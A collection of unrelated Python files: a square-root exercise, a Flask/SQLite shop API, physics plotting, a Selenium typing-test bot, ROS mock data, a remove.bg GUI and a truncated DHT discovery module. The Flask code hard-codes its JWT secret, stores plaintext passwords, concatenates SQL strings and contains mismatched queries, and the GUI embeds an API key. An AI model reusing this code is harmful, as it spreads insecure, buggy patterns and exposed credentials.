def squareRootExhaustive(x, epsilon):
"""Assumes x and epsilon are positive floats & epsilon < 1
Returns y such that y*y is within epsilon of x"""
step = epsilon**2
ans = 0.0
while abs(ans**2 - x) >= epsilon and ans*ans <= x:
print(ans)
ans += step
if ans*ans > x:
raise ValueError #what is raise
return ans
print(squareRootExhaustive(4, 0.2)) |
import hmac
import sqlite3
import datetime
from flask_cors import CORS
from flask import Flask, request, jsonify
from flask_jwt import JWT, jwt_required, current_identity
class User(object):
def __init__(self, id, username, password):
self.id = id
self.username = username
self.password = password
def init_user_table():
conn = sqlite3.connect('online.db')
print("Opened database successfully")
conn.execute("CREATE TABLE IF NOT EXISTS user"
"(user_id INTEGER PRIMARY KEY AUTOINCREMENT,"
"first_name TEXT NOT NULL,"
"last_name TEXT NOT NULL,"
"username TEXT NOT NULL,"
"password TEXT NOT NULL)")
print("user table created successfully")
conn.close()
def fetch_users():
with sqlite3.connect('online.db') as conn:
cursor = conn.cursor()
cursor.execute("SELECT * FROM user")
users = cursor.fetchall()
new_data = []
for data in users:
new_data.append(User(data[0], data[3], data[4]))
return new_data
def init_products_table():
with sqlite3.connect('online.db') as conn:
conn.execute("CREATE TABLE IF NOT EXISTS post (id INTEGER PRIMARY KEY AUTOINCREMENT,"
"name TEXT NOT NULL,"
"products TEXT NOT NULL,"
"price_of_product TEXT NOT NULL, "
"product_description TEXT NOT NULL)")
print("products table created successfully.")
init_user_table()
init_products_table()
users = fetch_users()
username_table = {u.username: u for u in users}
userid_table = {u.id: u for u in users}
def authenticate(username, password):
user = username_table.get(username, None)
if user and hmac.compare_digest(user.password.encode('utf-8'), password.encode('utf-8')):
return user
def identity(payload):
user_id = payload['identity']
return userid_table.get(user_id, None)
app = Flask(__name__)
app.debug = True
app.config['SECRET_KEY'] = 'super-secret'
jwt = JWT(app, authenticate, identity)
@app.route('/protected')
@jwt_required()
def protected():
return '%s' % current_identity
@app.route('/user-registration/', methods=["POST"])
def user_registration():
response = {}
if request.method == "POST":
first_name = request.form['first_name']
last_name = request.form['last_name']
username = request.form['username']
password = request.form['password']
with sqlite3.connect("online.db") as conn:
cursor = conn.cursor()
cursor.execute("INSERT INTO user("
"first_name,"
"last_name,"
"username,"
"password) VALUES(?, ?, ?, ?)", (first_name, last_name, username, password))
conn.commit()
response["message"] = "success"
response["status_code"] = 201
return response
@app.route('/create-products/', methods=["POST"])
@jwt_required()
def create_products():
response = {}
if request.method == "POST":
name = request.form['name']
price = request.form['price']
product_description = request.form['product_description']
date_created = datetime.datetime.now()
with sqlite3.connect('online.db') as conn:
cursor = conn.cursor()
cursor.execute("INSERT INTO post("
"name,"
"price,"
"product_description"
"date_created) VALUES(?, ?, ?)", (name, price, product_description, date_created))
conn.commit()
response["status_code"] = 201
response['description'] = "products added successfully"
return response
@app.route('/get-products', methods=["GET"])
def get_products():
response = {}
with sqlite3.connect("online.db") as conn:
cursor = conn.cursor()
cursor.execute("SELECT * FROM products")
products= cursor.fetchall()
response['status_code'] = 200
response['data'] = products
return response
@app.route("/delete-products/<int:post_id>")
@jwt_required()
def delete_products(products_id):
response = {}
with sqlite3.connect("online.db") as conn:
cursor = conn.cursor()
cursor.execute("DELETE FROM products WHERE id=" + str(products_id))
conn.commit()
response['status_code'] = 200
response['message'] = "product deleted successfully."
return response
@app.route('/edit-products/<int:products_id>/', methods=["PUT"])
@jwt_required()
def edit_post(products_id):
response = {}
if request.method == "PUT":
with sqlite3.connect('online.db') as conn:
incoming_data = dict(request.json)
put_data = {}
if incoming_data.get("name") is not None:
put_data["name"] = incoming_data.get("name")
with sqlite3.connect('online.db') as conn:
cursor = conn.cursor()
cursor.execute("UPDATE products SET name =? WHERE id=?", (put_data["name"], products_id))
conn.commit()
response['message'] = "Update was successful"
response['status_code'] = 200
if incoming_data.get("name") is not None:
put_data['name'] = incoming_data.get('name')
with sqlite3.connect('online.db') as conn:
cursor = conn.cursor()
cursor.execute("UPDATE post SET name =? WHERE id=?", (put_data["name"], products_id))
conn.commit()
response["name"] = " Name updated successfully"
response["status_code"] = 200
return response
@app.route('/get-products/<int:products_id>/', methods=["GET"])
def get_products(products_id):
response = {}
with sqlite3.connect("online.db") as conn:
cursor = conn.cursor()
cursor.execute("SELECT * FROM products WHERE id=" + str(products_id))
response["status_code"] = 200
response["description"] = "products retrieved successfully"
response["data"] = cursor.fetchone()
return jsonify(response)
|
#!/usr/bin/python
import sys
import re
import os
import numpy as np
from scipy import optimize
import math
from bs4 import BeautifulSoup
import requests
from tabulate import tabulate
import matplotlib.pyplot as plt
from matplotlib import animation
from matplotlib.ticker import AutoMinorLocator, MultipleLocator, LogLocator
from root_numpy import tree2rec
import argparse
#Setup command line option parser to capture the arguments
parser = argparse.ArgumentParser(description='Command arguments for sfresco running and plot creation')
parser.add_argument('-b','--beam', help='Beam (ELEMENT_MASSNUM_ATOMICNUM). Must be separated by underscores. ',required=True)
parser.add_argument('-t','--target',help='Target (ELEMENT_MASSNUM_ATOMICNUM). Must be separated by underscores.', required=True)
plt.rc('text', usetex=True)
plt.rc('font', family='serif')
#Table for beam masses
targetMasses = {
'C_12_6' : 11.9999999999999,
'Si_28_14' : 27.97692653246,
'Ca_40_20' : 39.962590983,
'Ni_58_28' : 57.935342907
}
#Table for target masses
beamMasses = {
'Li_6_3' : 6.015122794,
'Li_7_3' : 7.016004548,
'Be_7_4' : 7.016929828
}
args = parser.parse_args()
args_dict = vars(parser.parse_args())
target_str_unsplit = args.target
target_str = target_str_unsplit.split('_')
beam_str_unsplit = args.beam
beam_str = beam_str_unsplit.split('_')
beamZ = float(beam_str[2])
targetZ = float(target_str[2])
reaction = "${}^{%s}\!%s({}^{%s}\!%s,{}^{%s}\!%s){}^{%s}\!%s$" % ( target_str[1], target_str[0], beam_str[1], beam_str[0], beam_str[1], beam_str[0], target_str[1], target_str[0])
b = beam_str[0]+beam_str[1]
t = target_str[0]+target_str[1]
def getPotential( W, a, ri, Ap, At, r ) :
Ap_pow = pow(Ap,(float)(1/3))
At_pow = pow(At,(float)(1/3))
R = ri * (Ap_pow + At_pow)
return -W * pow( 1 + np.exp((r-R)/a) ,-1 )
imFig = plt.figure()
imAx = plt.axes(ylim=(-10,1) )
x = np.linspace(0,10,100)
y24 = [getPotential(5.046, 0.686, 1.429, beamZ, targetZ, aR) for aR in x]
y30 = [getPotential(7.492, 0.690, 1.300, beamZ, targetZ, aR) for aR in x]
y123p5 = [getPotential(8.922, 0.853, 1.294, beamZ, targetZ, aR) for aR in x]
y169 = [getPotential(14.55,0.712,1.102, beamZ, targetZ, aR) for aR in x]
y210 = [getPotential(16.53,0.878,1.041, beamZ, targetZ, aR) for aR in x]
y350 = [getPotential(24.29, 2.0, 0.970, beamZ, targetZ, aR) for aR in x]
yNasden318 = [getPotential(29.3, 0.878, 1.695, beamZ, targetZ, aR) for aR in x]
yNasden210 = [getPotential(34.2, 0.784, 1.682, beamZ, targetZ, aR) for aR in x]
plt.ylabel( '$U(r)_{\text{imag}} [MeV]$' )
plt.xlabel( '$r [fm]$' )
plt.title( 'Imaginary Potential' )
imAx.plot( x, y24, lw=2, linestyle='-', label="24 MeV" , color = "green")
imAx.plot( x, y30, lw=2, linestyle='-', label="30 MeV" , color = "blue")
imAx.plot( x, y123p5, lw=2, linestyle='-', label="123.5 MeV", color = "red" )
imAx.plot( x, y169, lw=2, linestyle='-', label="169 MeV", color = "black" )
imAx.plot( x, y210, lw=2, linestyle='-', label="210 MeV", color = "yellow" )
imAx.plot( x, y350, lw=2, linestyle='-', label="350 MeV", color = "orange" )
#imAx.plot( x, yNasden210, lw=2, linestyle='--', label="Nadasen 210", color="yellow", alpha=0.9 )
#imAx.plot( x, yNasden318, lw=2, linestyle='--', label="Nadasen 318", color="pink", alpha=0.9 )
plt.grid( True )
plt.legend(loc="best")
plt.savefig("Imaginary.pdf")
reAx = plt.axes(ylim=(-140,10))
yRe = [getPotential(180.0, 0.853, 0.529, beamZ, targetZ, aR) for aR in x]
yNadasen210Re = [getPotential(113.5, 0.793, 1.305, beamZ, targetZ, aR) for aR in x]
yNadasen318Re = [getPotential(126.9, 0.897, 1.136, beamZ, targetZ, aR) for aR in x]
plt.ylabel( '$U(r)_{\text{real}} [MeV]$' )
plt.xlabel( '$r [fm]$' )
plt.title( 'Real Potential' )
reAx.plot( x, yRe, lw=2, linestyle='-', label="OM Empirical", color="black")
reAx.plot( x, yNadasen210Re, lw=2, linestyle='--', label="Nadasen 210", color="red")
reAx.plot( x, yNadasen318Re, lw=2, linestyle='--', label="Nadasen 318", color="blue")
plt.grid( True )
plt.legend(loc="lower right")
plt.savefig("Real.pdf")
#plt.show()
|
# Importing required modules
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
import time
# Opening website
chrome = webdriver.Chrome()
chrome.get('https://www.livechatinc.com/typing-speed-test/#/')
#Wait while website opens
chrome.implicitly_wait(5)
#Set timeout time for while loop. 60 seconds.
timeout = time.time() + 60
#Grab current word to type and then enter it. Stop after 60 seconds.
while True:
if time.time() > timeout:
break
else:
string = ''
counter = 0
while '<' not in string:
string += chrome.page_source[chrome.page_source.index('data-reactid=".0.2.0.0.$=12.0.$=10.1.0.$0"')+43+counter]
counter += 1
string = string.replace('<',' ')
action = ActionChains(chrome)
action.send_keys(string)
action.perform() |
#! /usr/bin/env python
import rospy
import random
from math import sqrt
from threading import Thread
from functools import reduce
from centralized_dashboard.msg import NavigationMsg
from centralized_dashboard.msg import Drive
stop_flag = False
class NavData:
def __init__(self, topic_name='/nav_data', frequency=100):
self.publisher = rospy.Publisher(topic_name, NavigationMsg, queue_size=1)
self.subscriber = rospy.Subscriber('/set_nav_data', NavigationMsg, self.set_target)
self.rate = rospy.Rate(frequency)
self.cur_lat = 43.01
self.cur_long = -89.01
self.tar_lat = 43.01
self.tar_long = -89.01
def set_target(self, data):
self.tar_lat = data.tar_lat
self.tar_long = data.tar_long
def get_target_coordinates(self):
return {'lat': self.tar_lat, 'long': self.tar_long}
def get_current_coordinates(self):
# Sample is Bascom Hall
return {'lat': self.cur_lat, 'long': self.cur_long}
def get_heading(self):
'''
TODO: get this in a more dynamic way that yet makes sense
'''
return random.randrange(0, 360)
# a simulator of moving the mock rover car
def move_forward(self):
global stop_flag
if stop_flag:
return
line_speed = 0.0001
dist = sqrt((self.tar_lat - self.cur_lat)*(self.tar_lat - self.cur_lat) + (self.tar_long - self.cur_long)*(self.tar_long - self.cur_long))
if dist != 0 :
delta_lat = (self.tar_lat - self.cur_lat)/dist * line_speed
delta_long = (self.tar_long - self.cur_long)/dist * line_speed
else:
delta_lat = 0
delta_long = 0
self.cur_lat += delta_lat
self.cur_long += delta_long
def talker(self):
''''
Publishes fake navigation data using a NavigationMsg
TODO: implement
'''
msg = NavigationMsg()
while not rospy.is_shutdown():
## Build nav_data msg to send
#Target coords
target_coords_dict = self.get_target_coordinates()
msg.tar_lat = target_coords_dict['lat']
msg.tar_long = target_coords_dict['long']
#Current coords
current_coordinates = self.get_current_coordinates()
msg.cur_lat = current_coordinates['lat']
msg.cur_long = current_coordinates['long']
#Heading
msg.heading = self.get_heading()
# Publish pose at f rate
self.publisher.publish(msg)
self.move_forward() #simulator for moving forward
self.rate.sleep()
class DriveData:
def __init__(self, topic_name='/drive_data', frequency=100):
self.publisher = rospy.Publisher(topic_name, Drive, queue_size=1)
self.subscriber = rospy.Subscriber('/set_drive_data', Drive, self.set_speed)
self.rate = rospy.Rate(frequency)
self.wheel_speeds = [1, 1, 1, 1, 1, 1]
def get_wheel_speeds(self):
return self.wheel_speeds
def set_speed(self, data):
global stop_flag
self.wheel_speeds = [data.wheel0, data.wheel1, data.wheel2, data.wheel3, data.wheel4, data.wheel5]
stop_flag = reduce(lambda a,b: a and b, map(lambda a: a == 0, self.wheel_speeds))
def talker(self):
msg = Drive()
while not rospy.is_shutdown():
wheel_speeds = self.get_wheel_speeds()
msg.wheel0 = wheel_speeds[0]
msg.wheel1 = wheel_speeds[1]
msg.wheel2 = wheel_speeds[2]
msg.wheel3 = wheel_speeds[3]
msg.wheel4 = wheel_speeds[4]
msg.wheel5 = wheel_speeds[5]
# TODO: determine what are and if we need the other fields
self.publisher.publish(msg)
self.rate.sleep()
if __name__ == '__main__':
try:
rospy.init_node('mock_data', anonymous=False)
navigation_data = NavData()
thread_navigation_data = Thread(target=navigation_data.talker)
thread_navigation_data.daemon=True
thread_navigation_data.start()
drive_data = DriveData()
thread_drive_data = Thread(target=drive_data.talker)
thread_drive_data.daemon=True
thread_drive_data.start()
rospy.spin()
except rospy.ROSInterruptException:
print('ROSPY EXCETION')
|
import os
from tkinter import Tk, Menu, Label, Button
from tkinter.filedialog import askopenfilenames
from tkinter.messagebox import showinfo
# from ๅฎ็จไธปไนๅญฆPython.ๆ ๅพ.ๆ ้ค่ๆฏ import remove_bg
from removebg import RemoveBg
rmbg = RemoveBg('GiQrvx9AuuS6DH2Svh3JBfVK', 'error.log')
def remove_bg(img_path):
rmbg.remove_background_from_img_file(img_path)
IMGPATH = ''
class GUI(object):
def __init__(self, window):
self.window = window
self.window.title('ๅป้คๅพ็่ๆฏ')
self.window.geometry('300x200')
menubar = Menu(self.window)
#ๅฎไน็ฉบ่ๅ
filemenu = Menu(menubar, tearoff=0)
filemenu.add_command(label='ๅธฎๅฉ', command=self.helpme)
filemenu.add_separator()
#ๆพ็คบ
self.l = Label(window, text='')
self.l.pack(padx=5, pady=10) #ๅบๅฎ็ชๅฃ
#้ๆฉ็
ง็
btn1 = Button(window, text='้ๆฉ็
ง็', width=15, height=2, command=self.get_img)
btn1.pack()
#็ๆๅพ็
self.send_btn = Button(window, text='ๅป้ค่ๆฏ', width=15, height=2, command=self.gen_img)
self.send_btn.pack()
def helpme(self):
showinfo('ๅธฎๅฉ', '่ฏทๅ
ณๆณจๅ
ฌไผๅท๏ผ่็ณปไฝ่
')
def get_img(self):
global IMGPATH
#้ๆฉๆไปถ
filenames = askopenfilenames(filetypes=(('jpeg img', '*.jpeg'),
('jpg img', '*.jpg'), ('png img', "*.png")
))
if len(filenames) > 0:
fnlist = [fn for fn in filenames]
fnstr = '\n'.join(fnlist)
self.l.config(text=fnstr)
IMGPATH = fnlist
else:
self.l.config(text='็ฎๅๆฒกๆ้ๆฉไปปไฝๅพ็ๆไปถ')
def gen_img(self):
global IMGPATH
respathlist = []
for imgpath in IMGPATH:
filepath, tempfilename = os.path.split(imgpath)
filename, extension = os.path.splitext(tempfilename)
remove_bg(imgpath)
respathlist.append(imgpath)
respath = ' '.join(respathlist)
showinfo('ๅฎๆ็ๆ', f'ๅพ็ๅค็ๅฎๆ๏ผ่ทฏๅพไธบ: {respath}')
#ๅๅปบ็ชๅฃ
window = Tk()
GUI(window)
#ๆพ็คบ็ชๅฃ๏ผๅฟ
้กปๅจๆๆๆงไปถๅ
window.mainloop() |
'''
Discovery server database interface
Created on Oct 19, 2016
@author: riaps
'''
import typing
import re
import sys
import functools
import copy
import threading
import os
from os.path import join
from threading import RLock
import parse
import sched,time
from Cryptodome.PublicKey import RSA
from Cryptodome.Cipher import PKCS1_OAEP
from Cryptodome.Hash import SHA256
import opendht as dht
import ctypes
import czmq
import zyre
from zyre import Zyre, ZyreEvent
import lmdb
try:
import cPickle
pickle = cPickle
except:
cPickle = None
import pickle
from riaps.consts.defs import *
from riaps.run.exc import *
from riaps.utils.ifaces import get_random_port
from riaps.utils.config import Config
from .dbase import DiscoDbase
import logging
class DhtPeerMon(threading.Thread):
def __init__(self,context,hostAddress,riapsHome,dht,dhtPort):
threading.Thread.__init__(self,daemon=False)
self.logger = logging.getLogger(__name__)
self.context = context
self.hostAddress = hostAddress
self.riapsHome = riapsHome
self.control = None
self.dht = dht
self.dhtPort = dhtPort
self.peers = { } # uuid : address - all peers
self.peerGroup = set() # set(uuid) of peer group members
self.uuid = None
self.logger.info('DhtPeerMon:__inited__')
def setup(self):
self.logger.info('DhtPeerMon:setup()')
self.control = self.context.socket(zmq.PAIR)
self.control.bind(const.discoDhtPeerMonEndpoint)
return self.control
def terminate(self):
if self.control != None:
self.control.send_pyobj(('stop',))
else:
self.setup()
time.sleep(0.1)
self.control.send_pyobj(('stop',))
def peerHeaderKey(self,ipAddress):
return b'riaps_disco@' + ipAddress.encode('utf-8')
PEERMARK = b'CAFE'
PEERGROUP = b'riaps_disco'
PEERGROUP_STR = PEERGROUP.decode('utf-8')
def run(self):
self.zyre = Zyre(None)
if self.logger.level == logging.DEBUG:
self.zyre.set_verbose()
else:
pass
self.uuid = self.zyre.uuid()
self.zyre.set_interface(Config.NIC_NAME.encode('utf-8'))
if Config.SECURITY:
certFile = os.path.join(self.riapsHome,"keys",const.zmqCertificate)
cert = czmq.Zcert.load(ctypes.c_char_p(certFile.encode('utf-8')))
self.zyre.set_zcert(cert)
self.zyre.set_evasive_timeout(const.peerEvasiveTimeout)
self.zyre.set_expired_timeout(const.peerExpiredTimeout)
self.zyre.set_header(self.peerHeaderKey(self.hostAddress),self.PEERMARK)
self.command = self.context.socket(zmq.PAIR)
self.command.connect(const.discoDhtPeerMonEndpoint)
self.zyre.start()
self.zyre.join(self.PEERGROUP)
self.zyreSocket = self.zyre.socket()
self.poller = czmq.Zpoller(zyre.c_void_p(self.command.underlying),self.zyreSocket,0)
while True:
reader = self.poller.wait(-1) # Wait forever
if self.poller.terminated():
self.logger.info("DhtPeerMon.run - poller terminated")
break
if type(reader) == zyre.c_void_p and reader.value == self.command.underlying:
msg = self.command.recv_pyobj()
self.logger.info('DhtPeerMon.run - command: %s' % str(msg))
cmd = msg[0]
if cmd == 'stop':
break
else:
pass # Should be error
elif reader == self.zyreSocket:
event = ZyreEvent(self.zyre)
eType = event.type()
_pName = event.peer_name()
pUUID = event.peer_uuid()
pAddr = event.peer_addr()
group = event.group()
_headers = event.headers()
msg = event.get_msg()
# if eType != b'EVASIVE':
# print("# %s %s %s %s %s %s %s"
# % (str(eType),str(_pName),str(pUUID),str(pAddr),
# str(group),str(_headers),str(msg)))
if eType == b'ENTER':
self.logger.info("DhtPeerMon.ENTER %s from %s" % (pUUID.decode('utf-8'),pAddr.decode('utf-8')))
try:
pAddrStr = pAddr.decode('UTF-8')
(peerIp,peerPort) = parse.parse("tcp://{}:{}",pAddrStr)
peerHeaderKey = self.peerHeaderKey(peerIp)
_value = _headers.lookup(peerHeaderKey)
if (_value):
try:
value = ctypes.cast(_value,ctypes.c_char_p).value
assert value == self.PEERMARK
self.peers[pUUID] = (peerIp,peerPort)
self.logger.info("DhtPeerMon.ENTER valid peer")
except:
self.logger.info("DhtPeerMon.ENTER header value mismatch")
else:
self.logger.info("DhtPeerMon.ENTER header key mismatch")
except:
self.logger.info("DhtPeerMon.ENTER peer addr parsing error")
elif pUUID not in self.peers: # Skip the rest if this is not a peer
continue
elif eType == b'JOIN':
groupName = group.decode()
peer = pUUID
self.logger.info("DhtPeerMon.JOIN %s from %s" % (groupName, pUUID.decode('utf-8')))
if group != self.PEERGROUP:
self.logger.info("DhtPeerMon.JOIN another group")
pass
else:
self.peerGroup.add(peer)
self.zyre.whispers(peer,("%s://%d" % (self.PEERGROUP_STR,self.dhtPort)).encode('utf-8'))
elif eType == b'SHOUT' or eType == b'WHISPER':
arg = msg.popstr().decode()
self.logger.info("DhtPeerMon.SHOUT %s = %s " % (pUUID.decode('utf-8'), arg))
try:
# pAddrStr = pAddr.decode('UTF-8')
# (peerIp,_peerPort) = parse.parse("tcp://{}:{}",pAddrStr)
# assert peerIp == self.peers[pUUID]
(peerIp,peerPort) = self.peers[pUUID]
(peerDhtPort,) = parse.parse("%s://{}" % self.PEERGROUP_STR,arg)
if peerDhtPort:
self.logger.info("DhtPeerMon.bootstrap %s:%s" % (peerIp,peerDhtPort))
self.dht.bootstrap(str(peerIp),str(peerDhtPort))
except:
self.logger.error("DhtPeerMon.bootstrap failed")
elif eType == b'LEAVE':
groupName = group.decode()
self.logger.info("DhtPeerMon.LEAVE %s from %s" % (pUUID.decode('utf-8'),groupName))
if group != self.PEERGROUP:
self.logger.info("DhtPeerMon.LEAVE another group")
pass
else:
self.peerGroup.discard(pUUID)
elif eType == b'EXIT':
self.logger.info("DhtPeerMon.EXIT %s " % (str(pUUID)))
if pUUID in self.peers:
del self.peers[pUUID]
self.peerGroup.discard(pUUID)
else:
pass
self.command.close()
self.zyre.leave(self.PEERGROUP)
self.zyre.stop()
class DhtBackup(object):
'''
Dht registration backup database.
The database is a collection of key:str -> [value:bytes] pairs
'''
RIAPSAPPS = 'RIAPSAPPS'
def __init__(self):
'''
Constructor
'''
self.logger = logging.getLogger(__name__)
self.create = False
self.dbase = None
appFolder = os.getenv(DhtBackup.RIAPSAPPS, './')
dbPath = join(appFolder,const.regDb)
mapSize = const.appDbSize * 1024 * 1024
if os.path.exists(dbPath) and not os.access(dbPath,os.W_OK):
raise BuildError("regDb is not writeable")
while True:
try:
self.dbase = lmdb.open(dbPath,
map_size = mapSize,
metasync=True,
sync=True,
map_async=False,
mode=0o700,
readahead=True,
create = self.create,
writemap=False)
self.logger.info('regDb opened (create = %s)' % str(self.create))
break
except lmdb.Error:
self.create = True
except:
raise
def closeDbase(self):
with self.dbase.begin() as txn:
with txn.cursor() as curs:
go = True
while go:
go = curs.delete()
self.dbase.close()
self.logger.info('regDb closed')
@staticmethod
def unpickle(vl):
res = pickle.loads(vl)
return res if res else []
def getAllKeyValues(self):
with self.dbase.begin() as txn:
raw = list(txn.cursor().iternext())
return [(k.decode('UTF-8'),[v for v in self.unpickle(vl)] if vl else [])
for (k,vl) in raw]
def clearDbase(self):
with self.dbase.begin() as txn:
with txn.cursor() as curs:
go = True
while go: go = curs.delete()
def getKeyValues(self,key,default = None):
assert self.dbase != None
value = default
if type(key) == str: key = key.encode('utf-8')
with self.dbase.begin() as txn:
_value = txn.get(key)
if _value != None:
value = self.unpickle(_value)
return value
def addKeyValue(self,key,value):
assert self.dbase != None
res = False
if type(key) == str: key = key.encode('utf-8')
with self.dbase.begin(write=True) as txn:
values = []
_values = txn.get(key)
if _values != None:
values = self.unpickle(_values)
values += [value]
_values = pickle.dumps(values)
res = txn.put(key,_values)
return res
def delKey(self,key):
assert self.dbase != None
res = False
if type(key) == str: key = key.encode('utf-8')
with self.dbase.begin(write=True) as txn:
res = txn.delete(key)
return res
def delKeyValue(self,key,value):
assert self.dbase != None
res = False
if type(key) == str: key = key.encode('utf-8')
with self.dbase.begin(write=True) as txn:
values = []
_values = txn.get(key)
if _values != None:
values = self.unpickle(_values)
values = values.remove(value) if value in values else values
_values = pickle.dumps(values)
res = txn.put(key,_values)
return res
class DhtDbase(DiscoDbase):
'''
Discovery service database implemented using opendht
'''
def __init__(self,context_,hostAddress,dbaseLoc):
'''
Construct the dht object.
'''
super().__init__(context_, dbaseLoc)
self.logger = logging.getLogger(__name__)
global theDiscoBase
theDiscoBase = self
self.context = context_
self.hostAddress = hostAddress
self.root = dbaseLoc
self.dht = None
self.dhtPort = None
self.updates = []
self.updateLock = RLock()
self.clients = { }
self.listeners = { }
self.riapsHome = os.getenv('RIAPSHOME', './')
self.republisher = sched.scheduler(time.time,time.sleep)
self.republishMap = { }
self.republisherStart = threading.Event()
self.republisherThread = threading.Thread(name='dhtRepublisher',
target=self.dhtRepublishWorker,
daemon=False)
self.republisherStop = False
self.republishLock = RLock()
self.deletedMap = { }
self.regDb = DhtBackup()
self.private_key = None
self.cipher_rsa = None
if Config.SECURITY:
private_key_name = join(self.riapsHome,"keys/" + str(const.ctrlPrivateKey))
with open(private_key_name, 'rb') as f: key = f.read()
self.private_key = RSA.importKey(key)
self.cipher_rsa = PKCS1_OAEP.new(self.private_key)
self.peerMon = None
def cleanupRegDb(self):
keyValues = self.regDb.getAllKeyValues()
if keyValues:
self.logger.info("cleanup regdb")
for (key,values) in keyValues:
for value in values:
self.dhtRemove(key,value)
self.regDb.clearDbase()
def start(self):
'''
Start the database: connect to the root dht
'''
if self.root != None:
pair = re.split(":",self.root) # Root host, probably run by control
bootHost = str(pair[0])
bootPort = int(pair[1])
else:
bootHost = const.discoDhtHost # Default host,
bootPort = const.discoDhtPort
try:
self.logger.info("launching dht")
config = dht.DhtConfig()
config.setBootstrapMode(True)
if Config.SECURITY:
config.setIdentity(dht.Identity.generate("riaps-disco"))
self.dht = dht.DhtRunner()
self.dhtPort = get_random_port()
self.dht.run(port=self.dhtPort,config=config) # Run on a random, free port
except Exception:
raise DatabaseError("dht.start: %s" % sys.exc_info()[0])
if const.discoDhtBoot and bootHost and bootPort:
try:
self.logger.info("dht.bootstrap on %s:%s" % (str(bootHost),str(bootPort)))
self.dht.bootstrap(str(bootHost),str(bootPort))
except Exception:
raise DatabaseError("dht.bootstrap: %s" % sys.exc_info()[0])
# Create and start peer monitor
self.peerMon = DhtPeerMon(self.context,self.hostAddress,self.riapsHome,self.dht,self.dhtPort)
self.peerMon.setup()
self.peerMon.start()
time.sleep(0.1)
self.cleanupRegDb() # If something in the backup db, discard from the dht
self.republisherThread.start() # Start republisher
def fetchUpdates(self):
'''
Check and fetch the updated values of the subscribed keys if any
'''
with self.updateLock:
if len(self.updates) == 0: return []
try:
res = []
for (key,value) in set(self.updates):
clients = self.clients.get(key,None)
if clients: res.append((key,value,clients))
self.updates = []
return res
except Exception:
raise DatabaseError("dht: fetch %s" % sys.exc_info()[0])
except OSError:
raise DatabaseError("OS error")
def encryptData(self,data : bytes) -> bytes:
'''
Encrypt data with RSA cipher, if security is enabled
'''
return self.cipher_rsa.encrypt(data) if Config.SECURITY else data
def decryptData(self,data : bytes) -> bytes:
'''
Decrypt data with RSA cipher, if security is enabled
'''
return self.cipher_rsa.decrypt(data) if Config.SECURITY else data
def dhtValue(self,value : str) -> dht.Value:
'''
Convert a string value to bytes (wiht optional encryption) then to a dht.Value
'''
return dht.Value(self.encryptData(value.encode('UTF-8')))
def strValue(self,value : dht.Value) -> str:
'''
Retrieve the raw bytes from a dht.Value, optionally decrypt it, then covert it into a str.
'''
return self.decryptData(value.data).decode('UTF-8')
@staticmethod
def delValue(value: str) -> str:
return '-' + value
@staticmethod
def orgValue(value : str) -> str:
return value[1:] if value[0] == '-' else value
@staticmethod
def isDelValue(value: str) -> bool:
return value[0] == '-'
@staticmethod
def filterDelValues(values : [str]) -> [str]:
out = [v[1:] for v in values if v[0] == '-']
return [v for v in values if v[0] != '-' and v not in out]
def dhtGet(self,key : str) -> [str]:
'''
Retrieve values belonging to a key. Lowest level op.
'''
def wrapper(gen): # Filter values where decryption fails
while True:
try:
yield next(gen)
except StopIteration:
break
except ValueError:
pass
keyhash = dht.InfoHash.get(key)
dhtValues = self.dht.get(keyhash)
values = list(wrapper(map(self.strValue,dhtValues)))
self.logger.info('dhtGet[%s]: %r' % (key,values))
return values
def dhtPut(self,key : str,value : str) -> bool:
'''
Add a value to key. Lowest level op. Note: one key may have multiple values.
'''
keyhash = dht.InfoHash.get(key)
res = self.dht.put(keyhash,self.dhtValue(value))
self.logger.info('dhtPut[%s]:= %r (%r)' % (key,value,res))
return res
def dhtValueCallback(self,key: str, value : bytes, expired : bool) -> bool:
'''
ValueCallback - called when a key's value get updated.
'''
with self.updateLock:
try:
value_ = self.strValue(value)
except ValueError:
self.logger.error('dhtValueCallback[%s]: <INVALID>(%r)' % (key,expired))
return True
self.logger.info('dhtValueCallback[%s]: %r(%r)' % (key,value_,expired))
if expired or self.isDelValue(value_) or \
(key,value_) in self.republishMap or \
self.deletedMap.get(key,None) == value_:
pass
else:
self.updates += [(key,value_)]
if expired or self.isDelValue(value_):
_value = self.orgValue(value_)
self.deletedMap[key] = _value
self.updates = [(k,v) for (k,v) in self.updates if k != key and v != _value]
return True
def dhtListen(self,key):
'''
Set up a listener for the key.
The listener will call the ValueCallback with the key + other
arguments supplied by dht.
Return a listener token.
'''
keyhash = dht.InfoHash.get(key)
token = self.dht.listen(keyhash,
functools.partial(self.dhtValueCallback,key))
return token
def dhtRemove(self,key,value):
'''
Remove a specific k/v pair from the dht.
Because we cannot delete it, we add a 'deleted' version of the value to the key.
The original k/v will eventually expire, because it will not be republished.
'''
self.logger.info('dhtRemove[%s]=%r' % (key,value))
values = self.dhtGet(key)
if value in values:
_res = self.dhtPut(key,self.delValue(value))
self.deletedMap[key] = value
return list(set(values) - set([value]))
def dhtAddClient(self,key,client):
'''
Add a client to the key. Clients are local service clients
(app/actor/component/ports) that need to connect to the providers.
'''
self.clients[key] = list(set(self.clients.get(key,[]) + [client]))
if key not in self.listeners:
self.listeners[key] = self.dhtListen(key)
def dhtDelClient(self,key,client):
'''
'''
self.logger.info('dhtdelClient(%s,%r)' % (key,client))
listener = self.listeners.get(key,None)
if listener:
self.dht.cancelListen(listener)
del self.listeners[key]
if client in self.clients.get(key,[]):
self.clients[key].remove(client)
def dhtDelete(self,key):
'''
Delete all the values of a key.
Cancel the listener (if any), mark all values as deleted
'''
self.logger.info('dhtDelete[%s]' % (key,))
listener = self.listeners.get(key,None)
if listener:
self.dht.cancelListen(listener)
del self.listeners[key]
clients = self.clients.get(key,[])
if clients: del self.clients[key]
values = self.dhtGet(key)
for value in values:
_res = self.dhtPut(key,self.delValue(value))
self.deletedMap[key] = value
return values
def dhtRepublishWorker(self):
'''
Worker thread that runs the 'republisher' scheduler.
'''
while True:
self.republisherStart.wait() # Wait for re(start)
self.republisher.run() # Run scheduler
self.republisherStart.clear()
if self.republisherStop: break # Stop when flag is set
self.logger.info('republisher cycle')
def dhtRepublish(self,key,value):
'''
Do the actual republishing. Called by the scheduler.
'''
self.logger.info('dhtRepublish[%s]=%r' % (key,value))
if self.republisherStop: return
with self.republishLock:
event = self.republishMap.get((key,value),None) # Check if this republisher is still active
if event:
self.dhtPut(key,value) # Republish k/v pair on the dht
self.republishMap[(key,value)] = \
